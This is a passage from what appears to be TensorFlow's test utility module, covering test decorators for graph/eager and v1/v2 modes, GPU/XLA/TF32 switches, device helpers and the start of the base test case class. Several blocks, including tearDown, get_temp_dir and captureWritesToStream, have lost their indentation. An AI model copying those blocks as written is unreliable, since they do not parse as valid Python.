          with self.test_session(use_gpu=use_gpu, config=config):
            f(self, *args, **kwargs)
      except unittest.case.SkipTest:
        pass

      def run_eagerly(self, **kwargs):
        # NOTE(review): `args` is closed over from `decorated`, so the eager
        # pass reuses the same positional arguments as the graph pass.
        if not use_gpu:
          with ops.device("/device:CPU:0"):
            f(self, *args, **kwargs)
        else:
          f(self, *args, **kwargs)

      if assert_no_eager_garbage:
        ops.reset_default_graph()
        run_eagerly = assert_no_new_tensors(
            assert_no_garbage_created(run_eagerly))

      # This decorator runs the wrapped test twice.
      # Reset the test environment between runs.
      self.tearDown()
      self._tempdir = None
      # Create a new graph for the eagerly executed version of this test for
      # better isolation.
      graph_for_eager_test = ops.Graph()
      with graph_for_eager_test.as_default(), context.eager_mode():
        self.setUp()
        run_eagerly(self, **kwargs)
      ops.dismantle_graph(graph_for_eager_test)

    return tf_decorator.make_decorator(f, decorated)

  if func is not None:
    return decorator(func)
  return decorator
def py_func_if_in_function(f):
  """Wraps `f` in a py_func when invoked inside a tf.function."""

  def decorated(*args, **kwds):
    if not ops.inside_function():
      return f(*args, **kwds)

    # Collect the tensor-valued positional args and remember their positions.
    indexed_tensors = [(i, arg) for i, arg in enumerate(args)
                       if isinstance(arg, (ops.Tensor, variables.Variable))]
    tensor_indices = [pos for pos, _ in indexed_tensors]
    tensor_args = [arg for _, arg in indexed_tensors]

    def inner_f(*inner_tensor_args):
      # Splice the tensors handed in by py_func back into their original
      # argument positions.
      rebuilt_args = list(args)
      for pos, tensor in zip(tensor_indices, inner_tensor_args):
        rebuilt_args[pos] = tensor
      return f(*rebuilt_args, **kwds)

    return script_ops.py_func(inner_f, tensor_args, [])

  return tf_decorator.make_decorator(f, decorated)
def also_run_as_tf_function(f):
  """Runs the decorated test twice--once as is, once inside a tf.function.

  This allows you to run a test both in eager execution and inside a
  tf.function, exercising the two execution modes supported in tf 2.0. The test
  assertions are automatically done inside tf.py_funcs, and tf.function ensures
  that they run in the proper order and with the proper side effects.

  Currently variable creation is not supported in tests annotated with this
  decorator since it's tricky to ensure the variable doesn't get repeatedly
  created when retracing the tf.function.

  Args:
    f: the test method to be decorated

  Returns:
    The decorated test method, which will run both in eager and inside a
    tf.function.
  """

  def decorated(*args, **kwds):

    def invoke():
      f(*args, **kwds)

    with context.eager_mode():
      # Pass 1: plain eager execution.
      invoke()
      # Pass 2: the same body traced into a TF function.
      # TODO(b/121143941): Remove the autograph override.
      def_function.function(invoke, autograph=False)()

  return decorated
def deprecated_graph_mode_only(func=None):
  """Execute the decorated test in graph mode.

  This function returns a decorator intended to be applied to tests that are not
  compatible with eager mode. When this decorator is applied, the test body will
  be run in an environment where API calls construct graphs instead of executing
  eagerly.

  `deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
  `run_in_graph_and_eager_modes` are available decorators for different
  v1/v2/eager/graph combinations.

  Args:
    func: function to be annotated. If `func` is None, this method returns a
      decorator that can be applied to a function. If `func` is not None this
      returns the decorator applied to `func`.

  Returns:
    Returns a decorator that will run the decorated test method in graph mode.
  """

  def decorator(f):
    if tf_inspect.isclass(f):
      # Class target: recursively decorate setUp (if defined on the class)
      # and every test method.
      setup = f.__dict__.get("setUp")
      if setup is not None:
        setattr(f, "setUp", decorator(setup))
      for name, value in f.__dict__.copy().items():
        if (callable(value) and
            name.startswith(unittest.TestLoader.testMethodPrefix)):
          setattr(f, name, decorator(value))
      return f

    def decorated(self, *args, **kwargs):
      # Already in graph mode: nothing to switch.
      if not context.executing_eagerly():
        return f(self, *args, **kwargs)
      with context.graph_mode():
        return f(self, *args, **kwargs)

    return decorated

  if func is not None:
    return decorator(func)
  return decorator
# Alias: `run_deprecated_v1` is the same decorator as
# `deprecated_graph_mode_only`.
run_deprecated_v1 = deprecated_graph_mode_only
def run_all_in_deprecated_graph_mode_only(cls):
  """Execute all tests in a class in graph mode."""
  for method_name in dir(cls):
    is_test = method_name.startswith(unittest.TestLoader.testMethodPrefix)
    if not is_test or method_name == "test_session":
      continue
    method = getattr(cls, method_name, None)
    if callable(method):
      setattr(cls, method_name, deprecated_graph_mode_only(method))
  return cls
def run_v1_only(reason, func=None):
  """Execute the decorated test only if running in v1 mode.

  This function is intended to be applied to tests that exercise v1 only
  functionality. If the test is run in v2 mode it will simply be skipped.

  `deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
  `run_in_graph_and_eager_modes` are available decorators for different
  v1/v2/eager/graph combinations.

  Args:
    reason: string giving a reason for limiting the test to v1 only.
    func: function to be annotated. If `func` is None, this method returns a
      decorator that can be applied to a function. If `func` is not None this
      returns the decorator applied to `func`.

  Returns:
    Returns a decorator that will conditionally skip the decorated test method.
  """
  if not isinstance(reason, str):
    raise ValueError("'reason' should be string, got {}".format(type(reason)))

  def decorator(f):
    if tf_inspect.isclass(f):
      # To skip an entire test suite class, we only decorate the setUp method
      # to skip all tests. setUp may not be overridden on the class itself, so
      # walk the MRO and decorate the first setUp found (usually the one from
      # the TestCase base class).
      for cls in type.mro(f):
        setup = cls.__dict__.get("setUp")
        if setup is not None:
          setattr(f, "setUp", decorator(setup))
          break
      return f

    # Plain function target: wrap it with a conditional skip.
    def decorated(self, *args, **kwargs):
      if tf2.enabled():
        self.skipTest(reason)
      return f(self, *args, **kwargs)

    return decorated

  if func is not None:
    return decorator(func)
  return decorator
def run_v2_only(func=None):
  """Execute the decorated test only if running in v2 mode.

  This function is intended to be applied to tests that exercise v2 only
  functionality. If the test is run in v1 mode it will simply be skipped.

  `deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
  `run_in_graph_and_eager_modes` are available decorators for different
  v1/v2/eager/graph combinations.

  Args:
    func: function to be annotated. If `func` is None, this method returns a
      decorator that can be applied to a function. If `func` is not None this
      returns the decorator applied to `func`.

  Returns:
    Returns a decorator that will conditionally skip the decorated test method.
  """

  def decorator(f):
    if tf_inspect.isclass(f):
      raise ValueError("`run_v2_only` only supports test methods.")

    def decorated(self, *args, **kwargs):
      if not tf2.enabled():
        self.skipTest("Test is only compatible with v2")
      return f(self, *args, **kwargs)

    return decorated

  return decorator if func is None else decorator(func)
def run_gpu_only(func=None):
  """Execute the decorated test only if a GPU is available.

  This function is intended to be applied to tests that require the presence
  of a GPU. If a GPU is absent, it will simply be skipped.

  Args:
    func: function to be annotated. If `func` is None, this method returns a
      decorator that can be applied to a function. If `func` is not None this
      returns the decorator applied to `func`.

  Returns:
    Returns a decorator that will conditionally skip the decorated test method.
  """

  def decorator(f):
    if tf_inspect.isclass(f):
      raise ValueError("`run_gpu_only` only supports test methods.")

    def decorated(self, *args, **kwargs):
      if not is_gpu_available():
        self.skipTest("Test requires GPU")
      return f(self, *args, **kwargs)

    return decorated

  return decorator if func is None else decorator(func)
def run_cuda_only(func=None):
  """Execute the decorated test only if a CUDA GPU is available.

  This function is intended to be applied to tests that require the presence
  of a CUDA GPU. If a CUDA GPU is absent, it will simply be skipped.

  Args:
    func: function to be annotated. If `func` is None, this method returns a
      decorator that can be applied to a function. If `func` is not None this
      returns the decorator applied to `func`.

  Returns:
    Returns a decorator that will conditionally skip the decorated test method.
  """

  def decorator(f):
    if tf_inspect.isclass(f):
      raise ValueError("`run_cuda_only` only supports test methods.")

    def decorated(self, *args, **kwargs):
      if not is_gpu_available(cuda_only=True):
        self.skipTest("Test requires CUDA GPU")
      return f(self, *args, **kwargs)

    return decorated

  return decorator if func is None else decorator(func)
def run_gpu_or_tpu(func=None):
  """Execute the decorated test only if a physical GPU or TPU is available.

  This function is intended to be applied to tests that require the presence
  of a physical GPU or TPU. It complies with the following rules:
  - If a GPU is available, the test will run on the GPU.
  - If a GPU is absent and a TPU is available, the test will run on the TPU.
  - If both GPU and TPU are absent, the test will be skipped.

  Args:
    func: function to be annotated. If `func` is None, this method returns a
      decorator that can be applied to a function. If `func` is not None this
      returns the decorator applied to `func`.

  Returns:
    Returns a decorator that will conditionally skip the decorated test method.
  """

  def decorator(f):
    if tf_inspect.isclass(f):
      raise ValueError("`run_gpu_or_tpu` only supports test methods.")

    def decorated(self, *args, **kwargs):
      # GPU takes precedence over TPU (order of this tuple matters).
      for device_type in ("GPU", "TPU"):
        if config.list_physical_devices(device_type):
          return f(self, device_type, *args, **kwargs)
      self.skipTest("Test requires GPU or TPU")

    return decorated

  return decorator if func is None else decorator(func)
def with_forward_compatibility_horizons(*horizons):
  """Executes the decorated test with the specified forward-compat horizons.

  Args:
    *horizons: A list of (year, month, day) tuples. If the list includes
      `None`, then the test will also be run with no forward-compatibility
      horizon set.

  Returns:
    A decorator that will execute the test with the specified horizons.
  """
  if not horizons:
    raise ValueError("Expected at least one horizon.")
  for horizon in horizons:
    # A horizon is either None or an (int year, int month, int day) triple.
    is_valid = (horizon is None) or (
        len(horizon) == 3 and all(isinstance(x, int) for x in horizon))
    if not is_valid:
      raise ValueError("Bad horizon value: %r" % horizon)

  def decorator(f):
    if tf_inspect.isclass(f):
      raise ValueError("`with_forward_compatibility_horizons` only "
                       "supports test methods.")

    def decorated(self, *args, **kwargs):
      for horizon in horizons:
        if horizon is None:
          f(self, *args, **kwargs)
        else:
          year, month, day = horizon
          with forward_compatibility_horizon(year, month, day):
            f(self, *args, **kwargs)

    return decorated

  return decorator
@deprecation.deprecated(None,
                        "Use `tf.config.list_physical_devices('GPU')` instead.")
@tf_export("test.is_gpu_available")
def is_gpu_available(cuda_only=False, min_cuda_compute_capability=None):
  """Returns whether TensorFlow can access a GPU.

  Warning: if a non-GPU version of the package is installed, the function would
  also return False. Use `tf.test.is_built_with_cuda` to validate if TensorFlow
  was build with CUDA support.

  For example,
  >>> gpu_available = tf.test.is_gpu_available()
  >>> is_cuda_gpu_available = tf.test.is_gpu_available(cuda_only=True)
  >>> is_cuda_gpu_min_3 = tf.test.is_gpu_available(True, (3,0))

  Args:
    cuda_only: limit the search to CUDA GPUs.
    min_cuda_compute_capability: a (major,minor) pair that indicates the minimum
      CUDA compute capability required, or None if no requirement.

  Note that the keyword arg name "cuda_only" is misleading (since routine will
  return true when a GPU device is available irrespective of whether TF was
  built with CUDA support or ROCm support. However no changes here because
  ++ Changing the name "cuda_only" to something more generic would break
     backward compatibility
  ++ Adding an equivalent "rocm_only" would require the implementation check
     the build type. This in turn would require doing the same for CUDA and thus
     potentially break backward compatibility
  ++ Adding a new "cuda_or_rocm_only" would not break backward compatibility,
     but would require most (if not all) callers to update the call to use
     "cuda_or_rocm_only" instead of "cuda_only"

  Returns:
    True if a GPU device of the requested kind is available.
  """
  # This was needed earlier when we had support for SYCL in TensorFlow.
  del cuda_only

  try:
    for local_device in device_lib.list_local_devices():
      if local_device.device_type == "GPU":
        # Tuple comparison handles (major, minor) capability ordering.
        gpu_info = gpu_util.compute_capability_from_device_desc(local_device)
        cc = gpu_info.compute_capability or (0, 0)
        if not min_cuda_compute_capability or cc >= min_cuda_compute_capability:
          return True
    return False
  except errors_impl.NotFoundError as e:
    # A NotFoundError whose message mentions both "CUDA" and "not find" means
    # the runtime has no GPU support; treat that as "no GPU available" instead
    # of an error. Any other NotFoundError is re-raised.
    if not all(x in str(e) for x in ["CUDA", "not find"]):
      raise e
    else:
      logging.error(str(e))
      return False
@contextlib.contextmanager
def device(use_gpu):
  """Uses gpu when requested and available."""
  # Fall back to CPU when the GPU is not requested or not present.
  dev = "/device:GPU:0" if use_gpu and is_gpu_available() else "/device:CPU:0"
  with ops.device(dev):
    yield
@contextlib.contextmanager
def use_gpu():
  """Uses gpu when requested and available."""
  # Thin wrapper over `device(use_gpu=True)`.
  with device(use_gpu=True):
    yield
@contextlib.contextmanager
def force_gpu():
  """Force the gpu to be used."""
  # Pins all ops created in the body to /device:GPU:0 unconditionally.
  with ops.device("/device:GPU:0"):
    yield
@contextlib.contextmanager
def force_cpu():
  """Force the cpu to be used."""
  # Pins all ops created in the body to /device:CPU:0 unconditionally.
  with ops.device("/device:CPU:0"):
    yield
@contextlib.contextmanager
def deterministic_ops():
  """Context manager that enables deterministic ops for its body."""
  try:
    config.enable_deterministic_ops(True)
    yield
  finally:
    # Always restore non-deterministic behavior, even if the body raised.
    config.enable_deterministic_ops(False)
class CapturedWrites(object):
  """A utility class to load the captured writes made to a stream."""

  def __init__(self, capture_location):
    # Path of the file the stream's writes were captured into.
    self.capture_location = capture_location

  def contents(self):
    """Get the captured writes as a single string."""
    # Idiom fix: `read()` slurps the file directly instead of the original
    # `"".join(tmp_file.readlines())`, which built an intermediate line list.
    with open(self.capture_location) as tmp_file:
      output_data = tmp_file.read()
    return output_data
class FakeEagerSession(object):
  """Fake session so tests that conditionally use placeholders can use eager.

  There are a number of tests that conditionally use placeholders for shape
  inference. The pattern is demonstrated here:

  ```python
  with self.cached_session() as sess:
    if static_shape:
      y = math_ops.matmul(x, ...)
      feed_dict = {}
    else:
      x_ph = array_ops.placeholder(...)
      y = math_ops.matmul(x_ph, ...)
      feed_dict = {x_ph: x}
    val = sess.run(y, feed_dict=feed_dict)
  ```

  Since the feed_dict is empty when not using placeholders we should be able to
  call self.evaluate(), however this requires rewriting the test case.
  This class should be considered a stop-gap solution to get tests running with
  eager with minimal changes to the actual test.
  """

  def __init__(self, test_case):
    self._test_case = test_case

  def run(self, fetches, *args, **kwargs):
    """Evaluate `fetches`.

    Fail if additional args are specified.

    Args:
      fetches: A Tensor or a nested list/tuple of Tensors.
      *args: Positional arguments
      **kwargs: Keyword arguments

    Raises:
      RuntimeError: If args or kwargs are specified.

    Returns:
      Tensors as numpy values.
    """
    # A non-empty feed_dict means the test really needs placeholders, which
    # do not exist under eager execution.
    if kwargs.pop("feed_dict", {}):
      raise RuntimeError(
          "feed_dict is not supported when eager execution is enabled "
          "(in this case, sess.run(t) is shorthand for t.numpy()")
    if args or kwargs:
      raise RuntimeError(
          "Optional args are not supported when eager execution is enabled "
          "(in this case, sess.run(t) is shorthand for t.numpy()")
    return self._test_case.evaluate(fetches)
class ErrorLoggingSession(session.Session):
  """Wrapper around a Session that logs errors in run()."""

  def run(self, *args, **kwargs):
    try:
      return super(ErrorLoggingSession, self).run(*args, **kwargs)
    except Exception as exc:  # pylint: disable=broad-except
      # OutOfRangeError is the normal completion signal for tf.data
      # pipelines, so logging it would only add noise to test output.
      if not isinstance(exc, errors.OutOfRangeError):
        logging.error(str(exc))
      raise
def disable_cudnn_autotune(func):
  """Disable autotuning during the call to this function.

  Some tests want to base assertions on a graph being isomorphic with a copy.
  To ensure this, this decorator disables autotuning.

  Args:
    func: Function to run with CuDNN autotuning turned off.

  Returns:
    Decorated function.
  """

  def decorator(f):

    def decorated(self, *args, **kwargs):
      original_tf_cudnn_use_autotune = os.environ.get("TF_CUDNN_USE_AUTOTUNE")
      os.environ["TF_CUDNN_USE_AUTOTUNE"] = "false"
      original_xla_flags = os.environ.get("XLA_FLAGS")
      new_xla_flags = "--xla_gpu_autotune_level=0"
      if original_xla_flags:
        new_xla_flags = original_xla_flags + " " + new_xla_flags
      os.environ["XLA_FLAGS"] = new_xla_flags
      # BUG FIX: the original restored the environment only on the success
      # path, so a failing test leaked the autotune overrides into every
      # subsequent test in the process. Restore in a `finally` block instead.
      try:
        return f(self, *args, **kwargs)
      finally:
        if original_tf_cudnn_use_autotune is None:
          del os.environ["TF_CUDNN_USE_AUTOTUNE"]
        else:
          os.environ["TF_CUDNN_USE_AUTOTUNE"] = original_tf_cudnn_use_autotune
        if original_xla_flags is None:
          del os.environ["XLA_FLAGS"]
        else:
          os.environ["XLA_FLAGS"] = original_xla_flags

    return decorated

  if func is not None:
    return decorator(func)
  return decorator
# The description is just for documentation purposes.
def enable_tf_xla_constant_folding(description):
  """Returns a decorator that enables XLA constant folding for a test.

  Args:
    description: Documentation-only string explaining why the test needs
      constant folding.

  Raises:
    ValueError: If `description` is not a string.
  """
  if not isinstance(description, str):
    raise ValueError("'description' should be string, got {}".format(
        type(description)))

  def enable_tf_xla_constant_folding_impl(func):
    """Enable constant folding during the call to this function.

    Some tests fail without constant folding.

    Args:
      func: Function to run with constant folding turned on.

    Returns:
      Decorated function.
    """

    def decorator(f):

      def decorated(self, *args, **kwargs):
        original_var = pywrap_tf_session.TF_GetXlaConstantFoldingDisabled()
        pywrap_tf_session.TF_SetXlaConstantFoldingDisabled(False)
        # BUG FIX: restore the previous process-global flag even if the test
        # raises, so one failing test cannot change folding behavior for the
        # rest of the test run.
        try:
          return f(self, *args, **kwargs)
        finally:
          pywrap_tf_session.TF_SetXlaConstantFoldingDisabled(original_var)

      return decorated

    if func is not None:
      return decorator(func)
    return decorator

  return enable_tf_xla_constant_folding_impl
# Updates test function by selectively disabling it.
def _disable_test(execute_func):
  """Returns a decorator factory that runs the test only when `execute_func`."""

  def disable_test_impl(func):

    def decorator(func):

      def decorated(self, *args, **kwargs):
        # When disabled, skip the body entirely (implicitly returns None).
        if not execute_func:
          return None
        return func(self, *args, **kwargs)

      return decorated

    if func is not None:
      return decorator(func)
    return decorator

  return disable_test_impl
# The description is just for documentation purposes.
def disable_xla(description):  # pylint: disable=unused-argument
  """Execute the test method only if xla is not enabled."""
  return _disable_test(not is_xla_enabled())
# The description is just for documentation purposes.
def disable_mlir_bridge(description):  # pylint: disable=unused-argument
  """Execute the test method only if MLIR bridge is not enabled."""
  return _disable_test(not is_mlir_bridge_enabled())
# The description is just for documentation purposes.
def disable_asan(description):  # pylint: disable=unused-argument
  """Execute the test method only if ASAN is not enabled."""
  return _disable_test(not is_asan_enabled())
# The description is just for documentation purposes.
def disable_msan(description):  # pylint: disable=unused-argument
  """Execute the test method only if MSAN is not enabled."""
  return _disable_test(not is_msan_enabled())
# The description is just for documentation purposes.
def disable_tsan(description):  # pylint: disable=unused-argument
  """Execute the test method only if TSAN is not enabled."""
  return _disable_test(not is_tsan_enabled())
# The description is just for documentation purposes.
def disable_ubsan(description):  # pylint: disable=unused-argument
  """Execute the test method only if UBSAN is not enabled."""
  return _disable_test(not is_ubsan_enabled())
# The description is just for documentation purposes.
def disable_tfrt(unused_description):
  """Returns a decorator that drops the test (or suite) when TFRT is enabled."""

  def disable_tfrt_impl(cls_or_func):
    """Execute the test only if tfrt is not enabled."""
    if tf_inspect.isclass(cls_or_func):
      # Returning None in place of the class removes the whole suite.
      return None if tfrt_utils.enabled() else cls_or_func

    def decorator(func):

      def decorated(self, *args, **kwargs):
        if not tfrt_utils.enabled():
          return func(self, *args, **kwargs)

      return decorated

    if cls_or_func is not None:
      return decorator(cls_or_func)
    return decorator

  return disable_tfrt_impl
def for_all_test_methods(decorator, *args, **kwargs):
"""Generate class-level decorator from given method-level decorator.
It is expected for the given decorator to take some arguments and return
a method that is then called on the test method to produce a decorated
method.
Args:
decorator: The decorator to apply.
*args: Positional arguments
**kwargs: Keyword arguments
Returns: Function that will decorate a given classes test methods with the
decorator.
"""
def all_test_methods_impl(cls):
"""Apply decorator to all test methods in class."""
for name in dir(cls):
value = getattr(cls, name)
if callable(value) and name.startswith(
"test") and (name != "test_session"):
setattr(cls, name, decorator(*args, **kwargs)(value))
return cls
return all_test_methods_impl
# The description is just for documentation purposes.
def no_xla_auto_jit(description):  # pylint: disable=unused-argument
  """This test is not intended to be run with XLA auto jit enabled."""
  return _disable_test(not is_xla_enabled())
# The description is just for documentation purposes.
def xla_allow_fallback(description):  # pylint: disable=unused-argument
  """Returns a decorator that permits fallback to TF classic under XLA."""

  def xla_allow_fallback_impl(func):
    """Allow fallback to TF even though testing xla."""

    def decorator(func):

      def decorated(self, *args, **kwargs):
        if not is_xla_enabled():
          return func(self, *args, **kwargs)
        # Update the global XLABuildOpsPassFlags to enable lazy compilation,
        # which allows the compiler to fall back to TF classic. Remember the
        # old value so that we can reset it.
        old_value = pywrap_tf_session.TF_SetXlaEnableLazyCompilation(True)
        # BUG FIX: reset the global flag in a `finally` block so a failing
        # test cannot leave lazy compilation enabled for later tests.
        try:
          return func(self, *args, **kwargs)
        finally:
          pywrap_tf_session.TF_SetXlaEnableLazyCompilation(old_value)

      return decorated

    if func is not None:
      return decorator(func)
    return decorator

  return xla_allow_fallback_impl
# The description is just for documentation purposes.
def run_without_tensor_float_32(description):  # pylint: disable=unused-argument
  """Execute test with TensorFloat-32 disabled.

  While almost every real-world deep learning model runs fine with
  TensorFloat-32, many tests use assertAllClose or similar methods.
  TensorFloat-32 matmuls typically will cause such methods to fail with the
  default tolerances.

  Args:
    description: A description used for documentation purposes, describing why
      the test requires TensorFloat-32 to be disabled.

  Returns:
    Decorator which runs a test with TensorFloat-32 disabled.
  """

  def decorator(f):

    @functools.wraps(f)
    def decorated(self, *args, **kwargs):
      tf32_was_enabled = config.tensor_float_32_execution_enabled()
      try:
        config.enable_tensor_float_32_execution(False)
        f(self, *args, **kwargs)
      finally:
        # Restore the caller's TensorFloat-32 setting regardless of outcome.
        config.enable_tensor_float_32_execution(tf32_was_enabled)

    return decorated

  return decorator
# The description is just for documentation purposes.
def run_all_without_tensor_float_32(description):  # pylint: disable=unused-argument
  """Execute all tests in a class with TensorFloat-32 disabled."""
  class_decorator = for_all_test_methods(run_without_tensor_float_32,
                                         description)
  return class_decorator
def matmul_without_tf32(a, b, *args, **kwargs):
  """Run matmul but cast float32 inputs to float64 if TensorFloat-32 is enabled.

  This effectively runs matmul without TensorFloat-32. It should only be used in
  tests when verifying some other op or functions works correctly, e.g. to test
  `tf.linalg.sqrtm` by matrix multiplying the output of the op by itself. In
  such cases, the matmul itself is not being tested so it's OK to run it with
  higher precision.

  If a matmul itself is being tested, or some other op which uses matmul, use
  `run_without_tensor_float_32` instead.

  This also casts complex64 inputs to complex128, since TensorFloat-32 can also
  be used with complex64

  Args:
    a: First input to tf.linalg.matmul
    b: Second input to tf.linalg.matmul
    args: Other positional arguments to tf.linalg.matmul
    **kwargs: Other keyword arguments to tf.linalg.matmul

  Returns:
    A tensor with the same type as `a`.
  """
  if config.tensor_float_32_execution_enabled():
    # Dtypes affected by TensorFloat-32, mapped to the higher-precision dtype
    # used to emulate a non-TF32 matmul. This replaces two previously
    # duplicated branches with a single table-driven one.
    for tf32_dtype, wide_dtype in (("float32", "float64"),
                                   ("complex64", "complex128")):
      if a.dtype == tf32_dtype:
        ret = math_ops.matmul(
            math_ops.cast(a, wide_dtype), math_ops.cast(b, wide_dtype), *args,
            **kwargs)
        return math_ops.cast(ret, a.dtype)
  return math_ops.matmul(a, b, *args, **kwargs)
class EagerSessionWarner(object):
  """Stand-in yielded by session() when eager execution is enabled.

  Any attribute access or method call on this object raises an
  AttributeError explaining that sessions cannot be used under eager
  execution.
  """

  def __getattr__(self, name):
    del name  # Every attribute access is an error; the name is irrelevant.
    raise AttributeError(
        "Trying to access properties or call methods on the result of "
        "self.session(), self.cached_session(), etc while eager execution "
        "is enabled. If you're porting this test case to TF 2.0, either "
        "adapt the test to work with eager execution or insert a call to "
        "tf.disable_eager_execution() in the main() function of this test "
        "file.")
@tf_export("test.TestCase")
class TensorFlowTestCase(googletest.TestCase):
"""Base class for tests that need to test TensorFlow."""
  def __init__(self, methodName="runTest"):  # pylint: disable=invalid-name
    """Initializes the test case and configures global XLA/MLIR-bridge state.

    Args:
      methodName: Name of the test method to run, forwarded to
        `googletest.TestCase`.
    """
    super(TensorFlowTestCase, self).__init__(methodName)
    # Make sure we get unfiltered stack traces during the test
    traceback_utils.disable_traceback_filtering()
    if is_xla_enabled():
      # Auto-jit mode "2" with a minimum cluster size of 1 forces every op
      # through XLA; lazy compilation stays off so compilation errors surface
      # immediately.
      pywrap_tf_session.TF_SetXlaAutoJitMode("2")
      pywrap_tf_session.TF_SetXlaMinClusterSize(1)
      pywrap_tf_session.TF_SetXlaEnableLazyCompilation(False)
      pywrap_tf_session.TF_SetTfXlaCpuGlobalJit(True)
      # Constant folding secretly runs code on TF:Classic CPU, so we also
      # disable it here.
      pywrap_tf_session.TF_SetXlaConstantFoldingDisabled(True)
    # Check if the mlir bridge has been explicitly enabled or disabled. If
    # is_mlir_bridge_enabled() returns None, the user did not explicitly enable
    # or disable the bridge so do not update enable_mlir_bridge.
    if is_mlir_bridge_enabled():
      context.context().enable_mlir_bridge = True
    elif is_mlir_bridge_enabled() is not None:
      context.context().enable_mlir_bridge = False
    # Threads created via checkedThread(); each is verified terminated in
    # tearDown().
    self._threads = []
    # Lazily-created per-test temp directory (see get_temp_dir()).
    self._tempdir = None
    # Session reused by cached_session(); closed in tearDown().
    self._cached_session = None
    # Set in setUp(); may stay None if a subclass skips the parent setUp.
    self._test_start_time = None
    # This flag provides the ability to control whether the graph mode gets
    # initialized for TF1 or not. Initializing for TF1, which is what was
    # happening earlier, was preventing enablement of 'eager mode' in the test.
    self._set_default_seed = True
  def setUp(self):
    """Resets graph/RNG state before each test and starts the test timer."""
    super(TensorFlowTestCase, self).setUp()
    self._ClearCachedSession()
    # Seed Python's and NumPy's RNGs so tests are reproducible between runs.
    random.seed(random_seed.DEFAULT_GRAPH_SEED)
    np.random.seed(random_seed.DEFAULT_GRAPH_SEED)
    # Note: The following line is necessary because some test methods may error
    # out from within nested graph contexts (e.g., via assertRaises and
    # assertRaisesRegexp), which may leave ops._default_graph_stack non-empty
    # under certain versions of Python. That would cause
    # ops.reset_default_graph() to throw an exception if the stack were not
    # cleared first.
    ops._default_graph_stack.reset()  # pylint: disable=protected-access
    ops.reset_default_graph()
    # The TF1 graph seed is only set when requested, so eager-mode tests can
    # opt out via self._set_default_seed.
    if self._set_default_seed:
      random_seed.set_random_seed(random_seed.DEFAULT_GRAPH_SEED)
    # Reset summary writer in case another test used set_as_default() with their
    # summary writer.
    summary_state = summary_ops_v2._summary_state  # pylint: disable=protected-access
    summary_state.writer = None
    # Avoiding calling setUp() for the poorly named test_session method.
    if self.id().endswith(".test_session"):
      self.skipTest("Not a test.")
    self._test_start_time = time.time()
def tearDown(self):
# If a subclass overrides setUp and doesn't call the parent class's setUp,
# then we may not have set the start time.
if self._test_start_time is not None:
logging.info("time(%s): %ss", self.id(),
round(time.time() - self._test_start_time, 2))
for thread in self._threads:
thread.check_termination()
self._ClearCachedSession()
super(TensorFlowTestCase, self).tearDown()
def _ClearCachedSession(self):
if self._cached_session is not None:
self._cached_session.close()
self._cached_session = None
def get_temp_dir(self):
"""Returns a unique temporary directory for the test to use.
If you call this method multiple times during in a test, it will return the
same folder. However, across different runs the directories will be
different. This will ensure that across different runs tests will not be
able to pollute each others environment.
If you need multiple unique directories within a single test, you should
use tempfile.mkdtemp as follows:
tempfile.mkdtemp(dir=self.get_temp_dir()):
Returns:
string, the path to the unique temporary directory created for this test.
"""
if not self._tempdir:
self._tempdir = tempfile.mkdtemp(dir=googletest.GetTempDir())
return self._tempdir
@contextlib.contextmanager
def captureWritesToStream(self, stream):
"""A context manager that captures the writes to a given stream.
This context manager captures all writes to a given stream inside of a
`CapturedWrites` object. When this context manager is created, it yields
the `CapturedWrites` object. The captured contents can be accessed by
calling `.contents()` on the `CapturedWrites`.
For this function to work, the stream must have a file descriptor that
can be modified using `os.dup` and `os.dup2`, and the stream must support
a `.flush()` method. The default python sys.stdout and sys.stderr are
examples of this. Note that this does not work in Colab or Jupyter
notebooks, because those use alternate stdout streams.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
input = [1.0, 2.0, 3.0, 4.0, 5.0]
with self.captureWritesToStream(sys.stdout) as captured:
result = MyOperator(input).eval()
self.assertStartsWith(captured.contents(), "This was printed.")
```
Args:
stream: The stream whose writes should be captured. This stream must have
a file descriptor, support writing via using that file descriptor, and
must have a `.flush()` method.
Yields:
A `CapturedWrites` object that contains all writes to the specified stream
made during this context.
"""
stream.flush()
fd = stream.fileno()
tmp_file_path = tempfile.mktemp(dir=self.get_temp_dir())
tmp_file = open(tmp_file_path, "w")
orig_fd = os.dup(fd)
os.dup2(tmp_file.fileno(), fd)
try:
yield CapturedWrites(tmp_file_path)
finally:
tmp_file.close()
os.dup2(orig_fd, fd)
  def _AssertProtoEquals(self, a, b, msg=None):
    """Asserts that a and b are the same proto.

    Uses ProtoEq() first, as it returns correct results
    for floating point attributes, and then use assertProtoEqual()
    in case of failure as it provides good error messages.

    Args:
      a: a proto.
      b: another proto.
      msg: Optional message to report on failure.
    """
    # Only fall through to the slower, message-producing comparison when the
    # fast float-aware check says the protos differ.
    if not compare.ProtoEq(a, b):
      compare.assertProtoEqual(self, a, b, normalize_numbers=True, msg=msg)
def assertProtoEquals(self, expected_message_maybe_ascii, message, msg=None):
"""Asserts that message is same as parsed expected_message_ascii.
Creates another prototype of message, reads the ascii message into it and
then compares them using self._AssertProtoEqual().
Args:
expected_message_maybe_ascii: proto message in original or ascii form.
message: the message to validate.
msg: Optional message to report on failure.
"""
if isinstance(expected_message_maybe_ascii, type(message)):
expected_message = expected_message_maybe_ascii
self._AssertProtoEquals(expected_message, message, msg=msg)
elif isinstance(expected_message_maybe_ascii, (str, bytes)):
expected_message = type(message)()
text_format.Merge(
expected_message_maybe_ascii,
expected_message,
descriptor_pool=descriptor_pool.Default())
self._AssertProtoEquals(expected_message, message, msg=msg)
else:
assert False, ("Can't compare protos of type %s and %s." %
(type(expected_message_maybe_ascii), type(message)))
  def assertProtoEqualsVersion(
      self,
      expected,
      actual,
      producer=versions.GRAPH_DEF_VERSION,
      min_consumer=versions.GRAPH_DEF_VERSION_MIN_CONSUMER,
      msg=None):
    """Asserts `actual` equals `expected` prefixed with a `versions` block.

    Args:
      expected: The expected proto in ascii form, without the `versions` field.
      actual: The proto message to validate.
      producer: Value for the `versions.producer` field of the prefix.
      min_consumer: Value for the `versions.min_consumer` field of the prefix.
      msg: Optional message to report on failure.
    """
    expected = "versions { producer: %d min_consumer: %d };\n%s" % (
        producer, min_consumer, expected)
    self.assertProtoEquals(expected, actual, msg=msg)
def assertStartsWith(self, actual, expected_start, msg=None):
"""Assert that actual.startswith(expected_start) is True.
Args:
